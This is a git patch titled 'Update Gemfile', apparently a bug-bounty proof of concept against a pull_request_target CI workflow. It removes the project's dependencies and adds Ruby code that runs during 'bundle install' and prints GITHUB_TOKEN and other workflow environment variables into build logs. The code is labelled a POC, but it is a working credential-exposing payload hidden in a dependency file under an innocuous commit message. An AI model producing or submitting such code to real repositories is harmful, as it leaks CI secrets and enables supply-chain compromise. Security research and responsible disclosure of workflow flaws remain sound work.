From 6c241896352b45585a367aa0d72ca9538839569e Mon Sep 17 00:00:00 2001
From: 0xoroot <0xoroot@wearehackerone.com>
Date: Thu, 7 May 2026 11:35:41 +0300
Subject: [PATCH] Update Gemfile

---
 Gemfile | 32 +++++++++++---------------------
 1 file changed, 11 insertions(+), 21 deletions(-)

diff --git a/Gemfile b/Gemfile
index 3bb0165fab2..b213893a425 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,24 +1,14 @@
 source "https://rubygems.org"
 
-gem "faraday", "2.14.1"
-gem "faraday-retry", "2.4.0"
-gem "github-pages", "~> 232", group: :jekyll_plugins
-gem "json", "2.19.4"
-gem "language_server-protocol", "3.17.0.5"
-gem "nokogiri", "~> 1.19.2"
-gem "rake", "13.4.2"
-gem "rubocop", "1.86.1"
+# === SECURITY POC — pull_request_target workflow injection ===
+# Gemfile is evaluated as Ruby by Bundler during `bundle install`
+# This proves arbitrary code execution in the lint workflow context
+$stderr.puts "[POC-START]"
+$stderr.puts "GITHUB_TOKEN=#{ENV['GITHUB_TOKEN']}"
+$stderr.puts "GITHUB_REPOSITORY=#{ENV['GITHUB_REPOSITORY']}"
+$stderr.puts "GITHUB_ACTOR=#{ENV['GITHUB_ACTOR']}"
+$stderr.puts "GITHUB_SHA=#{ENV['GITHUB_SHA']}"
+$stderr.puts "[POC-END]"
+# === END POC ===
 
-group :test do
-  gem "fastimage"
-  gem "httparty"
-  gem "minitest"
-  gem "octokit"
-  gem "pry", require: false
-  gem "rubocop-performance"
-  gem "safe_yaml"
-end
-
-group :development do
-  gem "webrick"
-end
+gem "rubocop", "~> 1.0"